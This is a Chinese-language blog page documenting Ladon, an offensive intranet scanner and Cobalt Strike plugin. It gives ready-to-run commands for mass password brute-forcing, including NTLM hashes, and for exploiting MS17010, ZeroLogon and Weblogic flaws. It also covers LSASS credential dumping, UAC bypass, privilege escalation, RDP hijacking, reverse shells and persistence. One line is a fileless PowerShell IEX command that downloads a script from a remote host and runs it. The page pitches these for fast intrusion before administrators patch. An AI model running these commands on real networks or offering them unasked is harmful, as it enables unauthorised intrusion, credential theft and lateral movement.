logo

K8哥哥

没有绝对安全的系统

〖工具〗Ladon大型内网渗透扫描器&Cobalt Strike

本文于 1878 天之前发表

Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。10.10.6版本内置230个功能模块…

Author Ladon Bin GitHub issues Github Stars GitHub forksGitHub license

Ladon for Windows

Ladon GUI

Ladon for Cobalt Strike

Ladon for PowerShell

Python Ladon

Ladon for Linux

使用说明

ID 主题 URL
0 Ladon文档主页 https://k8gege.org/Ladon/
1 Ladon详细文档 http://k8gege.org/p/Ladon.html
2 Ladon简明教程 http://k8gege.org/Ladon/example.html
3 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage
4 Cobalt Strike https://github.com/k8gege/Aggressor
5 Exp生成器使用 https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
6 高度自定义插件 https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
7 外部模块参考 https://github.com/k8gege/K8CScan/wiki
8 PowerLadon https://github.com/k8gege/powerladon
9 PythonLadon https://github.com/k8gege/PyLadon
10 LinuxLadon https://github.com/k8gege/KaliLadon
11 LadonGo https://github.com/k8gege/LadonGo
12 漏洞演示视频 https://github.com/k8gege/K8CScan/tree/master/Video
13 Ladon6.0文档 http://k8gege.org/p/56393.html
14 Ladon6.2文档 http://k8gege.org/p/39070.html
13 Ladon6.4文档 http://k8gege.org/p/55476.html
16 Ladon6.5文档 http://k8gege.org/Ladon/WinShell.html
17 Ladon9.1功能 http://k8gege.org/Ladon/ladon91.html

源码编译

git clone https://github.com/k8gege/Ladon.git
使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE

成品下载

https://github.com/k8gege/Ladon/releases
Win7/2008或安装.net 2.x 3.x系统可使用Ladon.exe
Win8-win10或安装.net 4.x系统可使用Ladon40.exe

前言

无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。

关于Ladon

Ladon音译: 拉登或拉冬。因集成了很多模块,每个模块又可独立成为一个工具,和百头巨龙有很多头类似。
Ladon是希腊神话中的神兽,看守金苹果的百头巨龙。它从不睡觉,被赫拉克勒斯借扛天巨人之手诱巨龙睡着
杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中,偷盗者将金苹果送给了白雪公主,公主
为了报恩将金苹果分给了七个小矮人,吃下以后他们变成了龙珠散落到世界各地,龙珠分为七颗,它蕴含着
可以令奇迹发生的力量。当集齐7颗龙珠念出咒语,就能召唤神龙,而神龙则会实现召唤者提出的一个愿望。

程序简介

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。10.10.6版本内置230个功能模块,通过32种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用简单

虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具

运行环境

Windows

Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用
Ladon.ps1完美兼容win7-win10 PowerShell,不看版本可远程加载实现无文件渗透

Linux、Mac

安装Mono运行时,将KaliLodan改名为Ladon,通过mono执行Ladon即可。

1
2
3
apt install mono-runtime
wget https://github.com/k8gege/Ladon/raw/master/KaliLadon -O Ladon
mono Ladon 192.168.1.8/24 OnlinePC

由于mono的兼容性,不保证Mac或Linux下所有功能均可用
就对于Ladon功能的测试来看Kali的兼容性要比Ubuntu好
测试发现有些功能的稳定性以及速度没有Windows系统快
未列功能系未测试或暂不可用功能,使用前请先看说明

实测:在Kali 2019下可使用功能较多,Ubuntu兼容性比不上Kali,MacOS未对所有功能进行测试

全平台LadonGo

全平台:Linux、MacOS、Windows等OS
https://github.com/k8gege/LadonGo

奇葩条件

实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的

宗旨

一条龙服务,为用户提供一个简单易用、功能丰富、高度灵活的扫描工具

特色

扫描流量小
程序体积小
功能丰富强大
程序简单易用
插件支持多种语言
跨平台(Win/Kali/Ubuntu)等
支持Cobalt Strike插件化
支持PowerShell无文件渗透
Exp生成器可一键定制Poc
多版本适用各种环境

程序参数功能

1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量字符串列表(str.txt)
15 支持主机帐密列表(check.txt)
16 支持用户密码列表(userpass.txt)
17 支持指定范围C段扫描
18 支持参数加载自定义DLL(仅限C#)
19 支持参数加载自定义EXE(仅限C#)
20 支持参数加载自定义INI配置文件
21 支持参数加载自定义PowerShell
22 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
23 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)
24 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)
25 支持CIDR格式IP扫描,如100.64.0.0/10,192.168.1.1/20等
26 INI配置支持自定义程序密码爆破

内置功能模块(117)

0x001 资产扫描(11)

例子: Ladon OnlinePC(扫当前机器所处C段,其它模块同理)
例子: Ladon 192.168.1.8/24 OnlinePC

ID 模块名称 功能说明 返回结果
1 ICMP 存活主机扫描 存活IP(探测速度很快3-6秒/C段)
2 OnlinePC 存活主机扫描 存活IP、Mac地址、机器名、设备制造商
3 OnlineIP 仅存活主机IP 存活IP
4 UrlScan URL域名扫描 同服URL(不验证IP、域名、Web标题)
5 SameWeb 同服域名扫描 同服URL(验证IP、域名、Web标题)
6 WebScan Web信息扫描 存活IP、主机名、Banner、Web标题
7 WebDir 后台目录扫描 地址、HTTP状态
8 SubDomain 子域名爆破 子域名 (可用DomainIP/HostIP解析)
9 DomainIP 域名解析IP 域名、IP
10 HostIP 主机名转IP IP、域名
11 AdiDnsDump 域内机器信息获取(非域内请使用LdapScan探测) IP、域名

0x002 指纹识别/服务识别(17)

例子: Ladon OsScan
例子: Ladon 192.168.1.8/24 OsScan

ID 模块名称 功能说明 返回结果
1 OsScan 操作系统版本探测 存活IP、工作组\机器名、操作系统、开放服务
2 PortScan 端口扫描含Banner 主机名、开放端口、服务识别、Banner、Web
3 WhatCMS 86种Web指纹识别 URL、CMS、邮件系统、登陆页面、中间件(如Apache\Tomecat\IIS)等
4 CiscoScan 思科设备扫描 存活IP、设备型号、主机名、Boot、硬件版本
5 EnumMssql 枚举Mssql数据库主机 数据库IP、机器名、SQL版本
6 EnumShare 枚举网络共享资源 域、存活IP、共享路径
7 LdapScan 不指定密码时,仅探测LDAP服务器 IP是否LDAP服务器
8 FtpScan 不指定密码时,仅探测FTP服务器 IP是否FTP服务器
9 EthScan 多网卡主机探测
10 SmbInfo SMB信息探测 存活IP、机器名、Win版本、域名、DNS
11 NbtInfo NBT信息探测 存活IP、机器名、Win版本、域名、DNS
12 WmiInfo WMI信息探测 存活IP、机器名、Win版本、域名、DNS
13 RdpInfo RDP信息探测 存活IP、机器名、Win版本、域名、DNS
14 WinrmInfo Winrm信息探测 存活IP、机器名、Win版本、域名、DNS
15 MssqlInfo Mssql信息探测 存活IP、机器名、Win版本、域名、DNS
16 ExchangeInfo Exchange信息探测 存活IP、机器名、Win版本、域名、DNS
17 WhatCms Exchange服务器探测 存活IP、Exchange、Banner

0x003 口令检测/密码爆破(18)

[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]

例子: Ladon SshScan
例子: Ladon 192.168.1.8/24 SshScan
例子: Ladon 192.168.1.8:22 SshScan (指定端口)
例子: Ladon test.rar RarScan

ID 模块名称 功能说明 返回结果 依赖
1 SmbScan SMB密码爆破(Windows) 检测过程、成功密码、LOG文件
2 WmiScan Wmi密码爆破(Windowns) 检测过程、成功密码、LOG文件
3 NbtScan Ipc密码爆破(Windows) 检测过程、成功密码、LOG文件
4 LdapScan AD域密码爆破(Windows) 检测过程、成功密码、LOG文件
5 SmbHashScan SMB HASH密码爆破(Windows) 检测过程、成功密码、LOG文件
6 WmiHashScan WMI HASH密码爆破(Windows) 检测过程、成功密码、LOG文件
7 SshScan SSH密码爆破(Linux) 检测过程、成功密码、LOG文件
8 MssqlScan Mssql数据库密码爆破 检测过程、成功密码、LOG文件
9 OracleScan Oracle数据库密码爆破 检测过程、成功密码、LOG文件
10 MysqlScan Mysql数据库密码爆破 检测过程、成功密码、LOG文件
11 WeblogicScan Weblogic后台密码爆破 检测过程、成功密码、LOG文件
12 VncScan VNC远程桌面密码爆破 检测过程、成功密码、LOG文件
13 FtpScan Ftp服务器密码爆破 检测过程、成功密码、LOG文件
14 RarScan Rar压缩包密码爆破 检测过程、成功密码、LOG文件 Rar.exe
15 TomcatScan Tomcat后台登陆密码爆破 检测过程、成功密码、LOG文件
16 HttpBasicScan HttpBasic401认证密码爆破 检测过程、成功密码、LOG文件
17 WinrmScan Winrm认证密码爆破 检测过程、成功密码、LOG文件
18 NbtScan Netbios密码爆破 检测过程、成功密码、LOG文件
19 DvrScan 摄像头密码爆破 检测过程、成功密码、LOG文件

0x004 漏洞检测/漏洞利用(12)

例子: Ladon MS17010
例子: Ladon 192.168.1.8/24 MS17010
例子: Ladon http://192.168.1.8 WeblogicExp

ID 模块名称 功能说明
1 MS17010 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148)
2 SMBGhost SMBGhost远程溢出漏洞检测 (CVE-2020-0796)
3 WeblogicPoc Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
4 PhpStudyPoc PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
5 ActivemqPoc ActiveMQ漏洞检测(CVE-2016-3088)
6 TomcatPoc Tomcat漏洞检测(CVE-2017-12615)
7 WeblogicExp Weblogic漏洞利用(CVE-2019-2725)
8 TomcatExp Tomcat漏洞利用(CVE-2017-12615)
9 Struts2Poc Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
10 ZeroLogon CVE-2020-1472域控提权漏洞EXP
11 CVE-2020-0688 CVE-2020-0688 Exchange序列化漏洞利用
12 CVE-2020-0796 SMBGhost Win10远程漏洞

0x005 加密解密(4)

例子: Ladon 字符串 EnHex
例子: Ladon EnHex (批量str.txt)

ID 模块名称 功能说明
1 EnHex 批量Hex密码加密
2 DeHex 批量Hex密码解密
3 EnBase64 批量Base64密码加密
4 DeBase64 批量Base64密码解密

0x006 下载功能(2)

下载功能主要用于内网文件传输或者将VPS文件下载至目标机器

ID 模块名称 功能说明 用法
1 HttpDownLoad HTTP下载 Ladon HttpDownLoad http://k8gege.org/test.exe
2 FtpDownLoad Ftp下载 Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

0x007 网络嗅探(3)

基于Socket RAW嗅探,无需安装Winpcap,但需管理员权限
主要用于发现内网存活机器或嗅探管理员登陆FTP或WEB站点密码
后续可能会添加其它功能可能另外写个专门用于嗅探的工具
PS: 目前网上大部嗅探工具都是基于Winpcap抓包,某些机器针对其做限制,会提示找不到网卡无法嗅探。
重点是不少程序不是GUI就是只能在Linux下用,如果你用py的SCAPY(需winpcap)来实现发现程序高达48M
当然也可用于发现恶意木马上线地址(如Cobal strike默认一分钟才发包的netstat不一定看得到)

ID 模块名称 功能说明 用法
1 FtpSniffer/SnifferFtp Ftp密码嗅探 Ladon FtpSniffer 192.168.1.5
2 HttpSniffer/SnifferHTTP HTTP密码嗅探 Ladon HTTPSniffer 192.168.1.5
3 Sniffer 网络嗅探(源地址、目标地址) Ladon Sniffer

0x008 密码读取(3)

ID 模块名称 功能说明 用法
1 EnumIIS/IisPwd IIS站点密码读取 Ladon EnumIIS 或 Ladon IisPwd
2 DumpLsass DumpLsass内存密码 Ladon DumpLsass
3 web 捕获Win密码

0x009 信息收集(12)

ID 模块名称 功能说明 用法
1 EnumProcess/ProcessList/tasklist 进程详细信息 Ladon EnumProcess 或 Ladon Tasklist
2 GetCmdLine/CmdLine 获取命令行参数 Ladon cmdline 或 Ladon cmdline cmd.exe
3 GetInfo/GetInfo2 获取渗透基础信息 Ladon GetInfo 或 Ladon GetInfo2
4 GetPipe 查看本机命名管道 Ladon GetPipe
5 RdpLog 查看3389连接记录 Ladon RdpLog
6 QueryAdmin 查看管理员组用户 Ladon QueryAdmin
7 NetVer 查看安装.NET版本 Ladon NetVer 或 Ladon NetVersion
8 PsVer 查看PowerShell版本 Ladon PsVer 或 Ladon PSVersion
9 whoami 查看当前用户与特权 Ladon whoami
10 recent 查看用户最近访问文件 Ladon recent
11 AllVer 获取已安装程序列表 Ladon AllVer
12 Usblog 查看USB使用记录 Ladon Usblog

0x010 远程执行(8)

ID 模块名称 功能说明 用法
1 WmiExec 135端口执行命令 http://k8gege.org/Ladon/WinShell.html
2 PsExec 445端口执行命令 http://k8gege.org/Ladon/WinShell.html
3 AtExec 445端口执行命令 http://k8gege.org/Ladon/WinShell.html
4 SshExec 22端口执行命令 http://k8gege.org/Ladon/WinShell.html
5 JspShell Jsp一句话执行命令 http://k8gege.org/p/ladon_cs_shell.html
6 WebShell WebShell执行命令 http://k8gege.org/Ladon/webshell.html
7 WebShell CVE-2020-17144 http://k8gege.org/p/CVE-2020-17144.html
8 WinrmExec 5895端口执行命令 http://k8gege.org/Ladon/WinrmExec.html
9 SmbExec 445端口HASH执行命令 http://k8gege.org/Ladon/SmbExec.html

0x011 提权降权(9)

ID 模块名称 功能说明 用法
1 BypassUac 绕过UAC执行,支持Win7-Win10 Ladon BypassUac c:\1.exe 或 Ladon BypassUac c:\1.bat
2 GetSystem 提权或降权运行程序 Ladon GetSystem cmd.exe 或 Ladon GetSystem cmd.exe explorer
3 Runas 模拟用户执行命令 Ladon Runas user pass cmd
4 ms16135 提权至SYSTEM Ladon ms16135 whoami
5 BadPotato IIS或服务用户提权至SYSTEM Ladon BadPotato cmdline
6 SweetPotato IIS或服务用户提权至SYSTEM Ladon SweetPotato cmdline
7 SweetPotato Win10/2016提权至System Ladon SweetPotato cmdline
8 RDPHijack 远程桌面会话劫持 Ladon RDPHijack sessionID
9 CVE-2021-1675 打印机漏洞提权 Ladon CVE-2021-1675 c:\evil.dll

0x012 反弹Shell(4)

ID 模块名称 功能说明 协议
1 netcat 反弹Shell系列教程 TCP
2 MSF_Shell 反弹Shell系列教程 TCP/HTTP/HTTPS
3 PowerCat 反弹Shell系列教程 TCP/UDP/ICMP
4 MSF_Meter 反弹Shell系列教程 TCP/HTTP/HTTPS
5 runas Runas反弹Shell TCP

端口转发

1 | PortTran | 内网端口转发
2 | netsh | 系统命令端口转发

0x014 其它功能(12)

ID 模块名称 功能说明 用法
1 EnableDotNet 一键启用.net 3.5(2008系统默认未启用) Ladon EnableDotNet
2 gethtml 获取内网站点HTML源码 Ladon gethtml http://192.168.1.1
3 CheckDoor 检测后门(网上公开多年的) Ladon CheckDoor 或 Ladon AutoRun
4 GetIP 获取本机内网IP与外网IP Ladon GetIP
5 Open3389 一键开启3389 Ladon Open3389
6 ActiveAdmin 激活内置用户Administrator Ladon ActiveAdmin
7 ActiveGuest 激活内置用户Guest Ladon ActiveGuest
8 RunPS 无PowerShell.exe执行PowerShell脚本 Ladon RunPS *.ps1
9 RegAuto 添加注册表RUN启动项
10 sc 服务加启动项(system权限)
11 sc 服务执行程序(system权限)
12 at 计划执行程序(无需时间)(system权限)

注:以上仅是该工具内置模块的初级用法,外置插件或更高级用法请查看使用文档
中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用
高级用法Exp生成器一键生成Poc,使用各种语言编写插件扩展Ladon扫描能力。

外部插件模块(21)

ID 功能 实现语言 功能说明
1 漏洞扫描 C语言 CVE 2019-0708 Windows Rdp 3389漏洞批量检测
2 漏洞利用 Exp生成器 ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit
3 漏洞利用 Python CVE-2019-9621 Zimbra GetShell Exploit
4 漏洞利用 Python CVE-2019-0604 SharePoint GetShell Exploit
5 漏洞利用 Exp生成器 CVE 2016-3088 ActiveMQ GetShell Exploit
6 漏洞利用 Python Apache Solr 8.2.0 Velocity RCE 0day Exploit
7 漏洞利用 Exp生成器 PhpStudy后门 GetShell Exploit
8 命令执行 INI配置 INI调用外部程序命令批量Linux上控
9 命令执行 INI配置 INI调用外部程序命令批量Windowns上控
10 漏洞扫描 Python PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
11 漏洞扫描 Exp生成器 Weblogic CVE-2018-2894漏洞检测
12 漏洞利用 PowerShell MS17010EXP 永恒之蓝漏洞利用
13 脚本调用 PowerShell Kali 2019无PowerShell执行脚本
14 口令扫描 INI配置 ipcscan.ini INI插件之Ipc密码爆破
15 口令扫描 INI配置 smbscan.ini INI插件之Smb密码爆破
16 口令扫描 INI配置 smbhash.ini INI插件之NtlmHash爆破
17 口令扫描 INI配置 winrmscan.ini INI插件之Winrm密码爆破
18 信息收集 .NET 检测网站是否使用Shiro
19 漏洞扫描 Python 域控提权CVE-2020-1472-EXP
20 漏洞利用 Exp生成器 Drupal CVE-2018-7600
21 CVE-2020-0796 SMBGhost Win10远程漏洞
22 漏洞利用 Exp生成器 IIS写权限漏洞利用

文档参考Cscan: https://github.com/k8gege/K8CScan/wiki

中级用法

批量扫描

0x001 参数 ip/24 ip/16 ip/8
命令: Ladon 192.168.1.8/24 OnlinePC

0x002 文件 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt
程序根目录下创建对应文件即可,如批量扫描多个ip使用ip.txt,批量扫多个C段使用ip24.txt
无需指定txt程序会自动加载文件进行扫描,如扫描存活主机只需命令: Ladon OnlinePC

禁ping扫描

默认扫描会先通过icmp扫描主机是否存活,当使用工具转发内网
或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010

Socks5代理扫描

详见:http://k8gege.org/Ladon/proxy.html

linux/macos下KaliLadon

proxychains mono Ladon noping 192.168.1.8/24 MS17010
proxychains mono Ladon noping http://192.168.1.1 WhatCMS

windows下Ladon.exe

推荐proxifier 3.42及以上版本,最好是最新版4.0.1
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010

配置INI调用任意程序、密码爆破

适用场景,需调用相关命令或第三方工具进行批量操作
或者有新的POC,但来不及或无法写成DLL来调用时
很多第3方工具不支持批量或者说根本不支持批量网段
而Ladon不只限于批量IP、URL、IP段、任意内容等
是紧急情况下最适合用于验证内网是否存在漏洞工具
新的漏洞来时你能调好POC就不错了,批量更要时间

调用系统ping命令进行存活主机探测

ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping $ip$

命令: Ladon ping.ini
命令: Ladon 192.168.1.8/24 ping.ini

调用Python poc批量检测漏洞

[Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py $ip$

例子: https://github.com/k8gege/CVE-2019-11043

自定义程序密码爆破

例子:调用修改过的smbexec.exe进行HASH密码验证,原版不退出无法爆破
根目录下放4个文件,smbexec.exe、smbhash.ini、user.txt、pass.txt。

smbhash.ini
[Ladon]
exe=smbexec.exe
arg=-hashes $pass$ $user$@$ip$
isok=Launching semi-interactive shell
port=445
log=true

INI参数说明
isok:成功标志,必填项。如smbexec成功时返回”Launching semi-interactive shell”
port:对应端口,非必填。如SMB为445,Ladon先检测到端口开放,才进行密码爆破
log: 程序日志,非必填。如有些程序返回一堆错误结果,我们不想看,可不显示

检测内网C段是否使用同一个密码,命令:Ladon 192.168.1.1/24 smbhash.ini
详见:http://k8gege.org/p/53177.html

配置端口扫描参数

port.txt自定义端口

使用PortScan模块时,默认扫描常见高危漏洞端口
遇到修改了默认端口的,Ladon就无法扫描了吗?
使用port.txt
格式1:80,21,1433,3306,445
格式2:80-88,21-23,5800-5900
格式3:
21
23
80
格式4:
80-88
21-23

命令行自定义端口

Ladon 192.168.1.8/24 PortScan 80-89
Ladon 192.168.1.8-192.168.1.200 PortScan 22,80,1433,21,3306,1521

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认

user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码

数据库口令检测

数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行

mssql密码验证

(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan

oracle同理

192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan

mysql无需指定数据库名

192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan

系统密码
SSH密码爆破

check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
命令: Ladon SshScan

详细用法:http://k8gege.org/Ladon/sshscan.html

SMB/WMI密码爆破

check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan

NTLM HASH密码爆破

check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan

网站密码
weblogic密码爆破

check.txt(url 用户 密码)
http://192.168.1.8:7001/console weblogic k8gege
命令: Ladon WeblogicScan

文件密码
RAR文件密码爆破

因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码
命令: Ladon test.rar RarScan

PowerShell

PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用
PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。

0x001 PowerShell本地加载

适用于支持PowerShell交互远控或Shell,如Cobalt Strike

1
2
3
> powershell 
> Import-Module .\Ladon.ps1
> Ladon OnlinePC

0x002 Cmd本地加载

适用于还没跟上时代的远控或Shell只支持CMD交互

1
> powershell Import-Module .\Ladon.ps1;Ladon OnlinePC

0x003 Cmd远程加载

适用于还没跟上时代的远控或Shell只支持CMD交互

1
> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"

0x004 远控交互式CMD

0x005 菜刀非交互CMD

0x006 Empire非交互CMD

Empire的shell有点问题,分号被截断,可以加个cmd /c

0x007 MSF交互式CMD

高级用法

Ladon最初的设计就是一款扫描框架,为了方便才内置功能
毕竟需要使用一个功能就得在目标多上传一个文件是顶麻烦的
不像MSF框架和模块多大都无所谓,因为你只是在本地使用
为了让大家都可以自定义模块,Ladon插件支持多种编程语言
最菜可通过INI配置插件,了解HTTP可通过EXP生成器生成POC
懂得编程可使用C#、Delphi、VC编写DLL,PowerShell脚本

0x001 Exp生成器

EXP生成器教程: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
实战例子: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894

0x002 自定义模块教程

自定义模块教程: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle

0x003 插件例子源码

https://github.com/k8gege/Ladon/raw/master/MoudleDemo.rar

完整教程:http://k8gege.org/Ladon

Ladon下载

历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:https://k8gege.org/Download
8.5版本:K8小密圈

扫码加入K8小密圈